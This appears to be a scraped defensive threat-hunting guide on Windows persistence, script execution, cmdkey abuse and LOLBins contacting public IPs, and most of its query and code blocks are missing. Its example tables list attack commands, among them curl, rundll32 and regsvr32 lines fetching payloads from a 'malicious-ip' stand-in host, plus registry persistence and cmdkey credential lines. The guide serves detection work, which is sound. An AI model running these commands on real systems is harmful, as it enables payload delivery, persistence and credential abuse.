📊 Microsoft Defender for Endpoint (MDE) Query (KQL)

🕵️ Detect Registry Startup Modifications:

🕵️ Detect Encoded Commands in Startup Entries:

🕵️ Detect Non-Standard Paths in Startup Keys:

🕵️ Check Startup Persistence via Winlogon:

hashtag
🕵️ 3. Investigation Techniques

hashtag
1️⃣ Validate File Paths in Registry Entries:

hashtag
2️⃣ Check File Hashes:

hashtag
3️⃣ Correlate with Process Execution Logs (Event ID 4688):

  • Look for processes launched from the paths specified in registry keys.

hashtag
4️⃣ Verify Recent Changes:

Check timestamps for registry changes:

hashtag
5️⃣ Review File Contents (If Scripts Are Referenced):

hashtag
🔧 4. Remediation Steps

hashtag
📌 1. Identify and Remove Malicious Registry Entries

Remove Startup Key (PowerShell):

hashtag
📌 2. Disable Malicious Services:

hashtag
📌 3. Quarantine Malicious Files:

hashtag
📌 4. Perform Full Antivirus Scan:

hashtag
📌 5. Clear AutorunCache:

hashtag
🛡️ 5. Prevention Steps

  1. Enable Registry Auditing:

    • Enable Audit Object Access for critical registry keys.

  2. Enable Windows Defender Tamper Protection:

  1. Enable Attack Surface Reduction (ASR) Rules:

  1. Monitor Registry Changes:

    • Use SIEM tools to monitor suspicious registry changes in real-time.

  2. Restrict Permissions on Startup Keys:

    • Ensure only Administrators have write permissions to these registry keys.

  3. Educate Users:

    • Train users to identify phishing emails and avoid downloading untrusted software.

hashtag
🧠 6. Key Takeaways

  • Startup Registry Keys: Common persistence points for attackers.

  • Monitor Key Paths: Run, RunOnce, Winlogon.

  • Look for Non-Standard Paths: Files in Temp or AppData directories.

  • Audit Regularly: Regularly review registry changes and validate file paths.

hashtag
🚨 Detect BAT/VBS Script Execution: Threat Analysis

hashtag
🔍 1. Attack Breakdown

Batch (BAT) and VBScript (VBS) files are commonly used for:

  • System Administration Tasks: Legitimate scripts for automation.

  • Malware Delivery: Dropping or executing malicious payloads.

  • Persistence: Adding tasks or registry entries to ensure execution on startup.

  • Lateral Movement: Automating commands across multiple systems.

hashtag
📑 Common Malicious Scenarios:

Technique

Description

Example Command

Persistence

Add script execution to Run registry key

reg add HKCU\...Run /v script /d "C:\temp\evil.vbs"

Scheduled Task

Execute BAT/VBS via Task Scheduler

schtasks /create /tn "Update" /tr "C:\temp\evil.bat"

Encoded Script

Use encoded commands to evade detection

cscript.exe //E:VBScript //B C:\temp\script.vbs

Download & Execute

Download and run payloads

powershell -Command (New-Object System.Net.WebClient).DownloadFile

Fileless Execution

Execute in memory without dropping files

mshta.exe javascript:..

hashtag
📑 2. Common BAT/VBS Execution Paths

  • cmd.exe /c C:\Path\script.bat

  • cscript.exe C:\Path\script.vbs

  • wscript.exe C:\Path\script.vbs

  • explorer.exe C:\Path\script.bat

  • powershell.exe -File C:\Path\script.ps1

hashtag
📌 Indicators of Malicious BAT/VBS Scripts

  1. Execution from Suspicious Paths:

    • C:\Temp\

    • C:\Users\Public\

    • C:\Windows\Temp\

  2. Encoded or Obfuscated Commands:

    • Base64 Encoded payloads

    • Unusual escape characters (^, `)

  3. Unusual Parent Processes:

    • explorer.execmd.exescript.bat

    • outlook.exewscript.exe

  4. Network Connections:

    • HTTP/HTTPS requests initiated by wscript.exe or cmd.exe

hashtag
🛡️ 3. Detection Techniques

hashtag
📊 Manual Detection

🕵️ Check Running BAT/VBS Scripts:

🕵️ Check Recently Created BAT/VBS Files:

🕵️ Check Parent-Child Process Chains:

hashtag
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)

🕵️ Detect BAT/VBS Execution:

🕵️ Detect Encoded or Obfuscated BAT/VBS Execution:

🕵️ Identify BAT/VBS Network Connections:

🕵️ Look for Registry Persistence via BAT/VBS:

hashtag
🕵️ 4. Investigation Techniques

hashtag
1️⃣ Inspect the Script Content:

  • Open the script in Notepad or a code editor to review the content:

hashtag
2️⃣ Check Script Metadata:

  • Verify creation and modification timestamps:

hashtag
3️⃣ Trace Network Connections:

  • Identify any outbound network connections from the script:

hashtag
4️⃣ Correlate with Parent Process:

  • Identify the parent process that launched the script:

hashtag
5️⃣ Check Persistence Mechanisms:

  • Verify if the script is referenced in registry startup entries:

hashtag
🔧 5. Remediation Steps

hashtag
📌 Terminate Malicious Scripts:

hashtag
📌 Quarantine Suspicious Scripts:

hashtag
📌 Remove Registry Persistence:

hashtag
📌 Block Outbound Traffic from Suspicious Scripts:

hashtag
📌 Perform Full Security Scan:

hashtag
🛡️ 6. Prevention Steps

  1. Enable Script Block Logging:

  1. Restrict Script Execution Policies:

  1. Monitor Temporary Folders:

  • Block execution of .bat or .vbs scripts from C:\Temp, C:\Windows\Temp.

  1. Application Whitelisting (WDAC/AppLocker):

  • Create policies to block unauthorized script execution.

  1. Educate Users:

  • Warn users about opening email attachments or untrusted files.

hashtag
🧠 7. Key Takeaways

  • Monitor BAT/VBS Execution: Track script execution paths and processes.

  • Look for Network Activity: Scripts communicating with external servers are highly suspicious.

  • Focus on Persistence: Registry entries referencing BAT/VBS scripts require immediate review.

  • Use Event Logs & KQL Queries: Correlate script execution with network and file activity.

hashtag
🚨 Process Creating TXT/JSON/DB Files Inside Temp/AppData Directories: Threat Analysis

hashtag
🔍 1. Attack Breakdown

Temp (C:\Windows\Temp, C:\Users\<User>\AppData\Local\Temp) and AppData (C:\Users\<User>\AppData) directories are commonly used by both legitimate software and malware for temporary storage. Attackers often abuse these directories because:

  • They have write permissions for standard users.

  • They are less monitored by security tools.

  • Files in these directories are often ignored during routine audits.

hashtag
📑 Common Malicious Activities Involving TXT/JSON/DB Files:

File Type

Purpose

Example Use Case

TXT Files

Store plaintext configuration, stolen credentials, or logs

config.txt, dump.txt

JSON Files

Structured storage of stolen data or configurations

settings.json, config.json

DB Files

SQLite or flat-file databases for storing large stolen data

cache.db, user_data.db

hashtag
📌 2. Common Suspicious Indicators

  1. Non-Standard Process: Processes like cmd.exe, powershell.exe, or suspicious binaries creating TXT/JSON/DB files.

  2. Frequent Modifications: Files are constantly updated or appended.

  3. Large File Size: Unexpectedly large .txt, .json, or .db files.

  4. Encoded/Obfuscated Content: Base64 encoded text or binary blobs.

  5. Network Activity: Files are created and then immediately exfiltrated.

  6. Unusual File Names: Random strings (abcd1234.txt) or system-like names (system.log).

hashtag
🛡️ 3. Detection Techniques

hashtag
📊 Manual Inspection with PowerShell

🕵️ List Recent TXT/JSON/DB Files in Temp and AppData

🕵️ Identify Processes Accessing These Files

🕵️ Monitor File Write Activity in Real-Time

hashtag
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)

🕵️ Detect Processes Creating TXT/JSON/DB Files

🕵️ Detect Files Created by Suspicious Processes

🕵️ Identify Frequent Modifications to TXT/JSON/DB Files

🕵️ Monitor Exfiltration of TXT/JSON/DB Files

hashtag
🕵️ 4. Investigation Techniques

hashtag
1️⃣ Analyze File Contents

Open and inspect the content of suspicious files:

Check for encoded or obfuscated content:

hashtag
2️⃣ Check File Hashes

Verify file integrity:

  • Compare the hash with VirusTotal.

hashtag
3️⃣ Trace Parent Processes

Identify the process that created the file:

hashtag
4️⃣ Review Event Logs

  • Event ID 4663: Object Access (File/Folder Modification)

  • Event ID 4688: Process Creation

hashtag
🔧 5. Remediation Steps

hashtag
📌 1. Terminate Suspicious Processes

hashtag
📌 2. Quarantine Suspicious Files

hashtag
📌 3. Block Malicious Network Connections

hashtag
📌 4. Perform Full Antivirus Scan

hashtag
📌 5. Clean Temp Directories

hashtag
🛡️ 6. Prevention Steps

  1. Enable Controlled Folder Access in Defender:

  1. Restrict Execution in Temp and AppData Directories:

  • Use AppLocker or WDAC to block execution from these directories.

  1. Enable Object Access Auditing:

    • Enable Audit Object Access via Group Policy.

  2. Monitor File Creation in Temp and AppData:

  • Regularly monitor file activities in these directories.

  1. Limit User Write Permissions:

    • Ensure standard users cannot modify sensitive subdirectories.

  2. Educate Users:

    • Avoid downloading or executing files from untrusted sources.

hashtag
🧠 7. Key Takeaways

  • Monitor File Drops: Pay close attention to TXT/JSON/DB files in Temp and AppData.

  • Check Process Relationships: Correlate file creation with parent processes.

  • Look for Obfuscation: Encoded content or random filenames are red flags.

  • Audit Network Traffic: Exfiltration often follows data staging.

hashtag
🚨 Signed Binary Proxy Execution - Cmdkey: Threat Analysis

hashtag
🔍 1. Attack Breakdown

hashtag
📝 What is cmdkey.exe?

  • cmdkey.exe is a legitimate Windows binary used to manage stored credentials in the Windows Credential Manager.

  • It allows users to create, delete, and list cached credentials for remote systems and network shares.

hashtag
📑 Why is it Abused?

Attackers often abuse cmdkey.exe because:

  1. It's a signed binary, trusted by Windows.

  2. It can store or retrieve credentials, useful for credential dumping or lateral movement.

  3. It can run commands or access resources without raising suspicion.

hashtag
📌 Common Malicious Uses of cmdkey.exe:

Technique

Example Command

Purpose

Add Cached Credentials

cmdkey /add:192.168.1.10 /user:admin /pass:P@ssw0rd

Store credentials for lateral movement.

List Cached Credentials

cmdkey /list

Enumerate stored credentials.

Access Remote Shares

cmdkey /add:remotehost /user:domain\admin /pass:password123

Authenticate and access shares stealthily.

Delete Credentials

cmdkey /delete:target

Clear credentials after access.

hashtag
🛡️ 2. Detection Techniques

hashtag
📊 Manual Inspection via Command Line

🕵️ List All Cached Credentials:

🕵️ Monitor Process Activity with cmdkey.exe:

🕵️ Identify Command History for cmdkey:

hashtag
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)

🕵️ Detect cmdkey Usage:

🕵️ Detect Credential Dumping via cmdkey:

🕵️ Detect cmdkey for Lateral Movement:

🕵️ Identify cmdkey with Suspicious Parents:

hashtag
📊 Event Viewer Logs

  • Event ID 4688: Process Creation

  • Event ID 4624: Account Login (Authentication Success)

  • Event ID 4776: Domain Controller attempts to validate credentials

Filter for cmdkey.exe in Event ID 4688:

  1. Open Event ViewerWindows LogsSecurity

  2. Filter for:

hashtag
🕵️ 3. Investigation Techniques

hashtag
1️⃣ Validate the Command Line Arguments:

  • Check the parameters passed to cmdkey.exe.

  • Look for encoded credentials or suspicious IPs.

hashtag
2️⃣ Trace Parent Process:

  • Identify the parent process that launched cmdkey.exe:

hashtag
3️⃣ Review Credentials in Credential Manager:

  • Open Credential Manager (control.exe /name Microsoft.CredentialManager)

  • Look for unexpected entries.

hashtag
4️⃣ Check User Context:

  • Identify the user account executing cmdkey.exe:

hashtag
5️⃣ Analyze Related Network Activity:

  • Check if cmdkey was used to access remote systems:

hashtag
🔧 4. Remediation Steps

hashtag
📌 1. Terminate Suspicious Processes

hashtag
📌 2. Remove Malicious Cached Credentials

  • Remove specific credentials:

  • Clear all cached credentials:

hashtag
📌 3. Monitor and Reset Affected Accounts

  • Reset passwords for accounts listed in cached credentials.

hashtag
📌 4. Block Unauthorized Use of cmdkey:

  • Implement AppLocker or WDAC policies to restrict access to cmdkey.exe.

Example AppLocker Rule:

hashtag
📌 5. Perform a Full Antivirus Scan

hashtag
🛡️ 5. Prevention Steps

  1. Enable Process Command Line Logging:

    • Use Audit Process Creation via Group Policy.

  2. Limit Access to cmdkey.exe:

    • Restrict access to cmdkey.exe to administrative users only.

  3. Enable Credential Guard:

  1. Regular Password Rotation:

    • Rotate credentials regularly to limit exposure.

  2. Enable ASR Rules in Defender:

  1. SIEM Monitoring:

    • Set alerts for cmdkey.exe commands like /list, /add, /delete.

hashtag
🧠 6. Key Takeaways

  • cmdkey.exe is a legitimate Windows binary often abused for credential manipulation and lateral movement.

  • Monitor commands containing /add, /list, /delete.

  • Pay attention to parent processes (e.g., powershell.exe, cmd.exe).

  • Use KQL Queries and Event Viewer Logs for detection.

  • Restrict usage via AppLocker and Credential Guard.

hashtag
🚨 PowerShell/CMD/WMIC/Rundll32/Regsvr32 Communicating to Public IP: Threat Analysis

hashtag
🔍 1. Attack Breakdown

hashtag
📝 Why These Tools Are Abused?

  • PowerShell: Powerful scripting tool for automation, often used for fileless attacks.

  • CMD: Default command-line interpreter, used to run scripts and commands.

  • WMIC: Windows Management Instrumentation Command-line, abused for information gathering.

  • Rundll32: Executes DLL files, often used for stealthy payload execution.

  • Regsvr32: Registers or unregisters DLL files, used for proxy execution.

hashtag
📑 Why Public IP Communication Is Suspicious?

  • Legitimate tools rarely need to communicate with public IP addresses directly.

  • Public IP communication could indicate:

    • Command & Control (C2) communication.

    • Data Exfiltration.

    • Payload Downloading.

    • Lateral Movement Across Networks.

hashtag
📊 2. Common Malicious Commands

Tool

Malicious Command Example

Purpose

PowerShell

powershell.exe -NoP -Enc SQBFAFgAUABMAE8AUgBFAFIA

Run encoded payload.

CMD

cmd.exe /c curl http://malicious-ip/payload.exe

Download and execute.

WMIC

wmic process call create "powershell -enc xyz"

Execute malicious script.

Rundll32

rundll32.exe javascript:"\\http://malicious-ip/payload.dll"

Load malicious DLL.

Regsvr32

regsvr32.exe /s /n /u /i:http://malicious-ip/file.sct

Register script for persistence.

hashtag
🛡️ 3. Detection Techniques

hashtag
📊 Manual Inspection

🕵️ Check Network Connections

PowerShell Example:

🕵️ Trace Parent Processes

🕵️ List Suspicious Connections

🕵️ Check Recent Commands

hashtag
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)

🕵️ Detect Suspicious Outbound Connections

🕵️ Detect Suspicious Parent Processes:

🕵️ Monitor HTTP/HTTPS Requests:

🕵️ Check for Encoded or Obfuscated Commands:

hashtag
📊 Event Viewer Logs

  • Event ID 4688: Process Creation

  • Event ID 5156: Network Connection Allowed

  • Event ID 4104: PowerShell Script Block Logging

Filter Example for PowerShell:

  • Open Event ViewerApplications and Services Logs → Microsoft → Windows → PowerShell → Operational

  • Search for Event ID 4104 and filter:

hashtag
🕵️ 4. Investigation Techniques

hashtag
1️⃣ Validate Remote IP Addresses

  • Use tools like VirusTotal, AbuseIPDB, or Shodan to validate IP addresses:

hashtag
2️⃣ Trace Parent-Child Processes

  • Check parent processes:

hashtag
3️⃣ Inspect Command History

  • Review PowerShell and CMD history:

hashtag
4️⃣ Inspect Downloads

  • Check if files were downloaded:

hashtag
🔧 5. Remediation Steps

hashtag
📌 1. Isolate the System

hashtag
📌 2. Terminate Malicious Processes

hashtag
📌 3. Block Suspicious IPs in Firewall

hashtag
📌 4. Quarantine Suspicious Files

hashtag
📌 5. Perform Full Antivirus Scan

hashtag
🛡️ 6. Prevention Steps

  1. Enable Script Block Logging:

  1. Restrict Unsigned Scripts:

  1. Enable Attack Surface Reduction (ASR) Rules:

  1. Monitor Outbound Traffic:

  • Use SIEM tools to alert on non-standard tools communicating with public IPs.

  1. User Awareness:

  • Educate users to avoid executing unknown scripts or commands.

hashtag
🧠 7. Key Takeaways

  • Legitimate Tools, Malicious Intent: PowerShell, CMD, WMIC, Rundll32, and Regsvr32 are often abused.

  • Monitor Public IP Communication: Legitimate tools rarely interact directly with public IPs.

  • Focus on Obfuscation: Commands with -enc, Base64, or long strings are suspicious.

  • SIEM Alerts Are Essential: Real-time monitoring and alerting are crucial.

hashtag
🚨 Non-Baselined wscript.exe Executed: Threat Analysis

hashtag
🔍 1. Attack Breakdown

hashtag
📝 What is wscript.exe?

  • wscript.exe (Windows Script Host) is a legitimate Windows binary used to execute VBScript (.vbs) and JScript (.js) files.

  • It is commonly used for system automation and script execution.

hashtag
📑 Why Attackers Abuse wscript.exe?

  • Living Off the Land Binary (LOLBin): Trusted by Windows, bypasses many security tools.

  • Fileless Attacks: Can execute encoded or obfuscated scripts directly in memory.

  • Persistence Mechanism: Can run scripts on startup.

  • Evasion Tactics: Attackers use obfuscated .vbs scripts to hide payloads.

hashtag
📌 2. Common Malicious Uses of wscript.exe

Technique

Command Example

Purpose

Execute Malicious Script

wscript.exe C:\Temp\malicious.vbs

Run a malicious VBScript file.

Download Payload

wscript.exe //E:VBScript //B C:\Temp\payload.vbs

Download and execute payload.

Encoded Script Execution

wscript.exe /E:vbscript "echo <Base64String>"

Execute encoded payload.

Obfuscation

wscript.exe "C:\Users\Public\update.vbs"

Run hidden scripts from suspicious locations.

Persistence

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Update /t REG_SZ /d "wscript.exe C:\Temp\persist.vbs"

Add persistence via registry.

hashtag
🛡️ 3. Detection Techniques

hashtag
📊 Manual Detection

🕵️ List Running Instances of wscript.exe:

🕵️ Check Command-Line History for Suspicious Scripts:

🕵️ Identify Script Execution Paths:

hashtag
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)

🕵️ Detect wscript.exe Execution:

🕵️ Detect Suspicious Scripts in Non-Standard Locations:

🕵️ Identify Encoded or Obfuscated Scripts:

🕵️ Identify Suspicious Parent Processes:

🕵️ Detect wscript.exe Communicating with Public IP:

hashtag
📊 Event Viewer Logs

  • Event ID 4688: Process Creation

  • Event ID 4104: Script Block Logging (PowerShell)

  • Event ID 5156: Network Connection Allowed

Filter Example for wscript.exe:

  1. Open Event ViewerWindows Logs → Security

  2. Filter for:

hashtag
🕵️ 4. Investigation Techniques

hashtag
1️⃣ Inspect Script Contents

  • Open .vbs or .js files using a text editor:

hashtag
2️⃣ Check File Hashes

  • Validate against VirusTotal:

hashtag
3️⃣ Trace Parent Processes

  • Identify what triggered wscript.exe:

hashtag
4️⃣ Review Registry for Persistence

  • Check common persistence registry keys:

hashtag
5️⃣ Monitor Network Traffic

  • Identify network connections initiated by wscript.exe:

hashtag
🔧 5. Remediation Steps

hashtag
📌 1. Terminate Suspicious Processes

hashtag
📌 2. Quarantine Malicious Scripts

hashtag
📌 3. Remove Registry Persistence

hashtag
📌 4. Block Outbound Traffic

hashtag
📌 5. Perform Full Antivirus Scan

hashtag
🛡️ 6. Prevention Steps

  1. Restrict Execution of .vbs Files from Temp/AppData:

    • Use AppLocker or WDAC to prevent .vbs execution from non-standard locations.

  2. Disable Windows Script Host (WSH) if not required:

  1. Enable Script Block Logging:

  1. Monitor File Drops in Temp/AppData:

    • Regularly inspect C:\Temp and C:\Users\<User>\AppData\Local\Temp.

  2. Educate Users:

    • Avoid opening untrusted email attachments or .vbs files.

hashtag
🧠 7. Key Takeaways

  • Monitor Non-Standard Execution Paths: Scripts in Temp and AppData are red flags.

  • Focus on Network Activity: wscript.exe should rarely make outbound connections.

  • Parent-Child Analysis: Identify who spawned wscript.exe.

  • Disable Unused Tools: If not required, disable Windows Script Host.

PreviousPractical Exercise on threat intelligenceNextpart 2

Last updated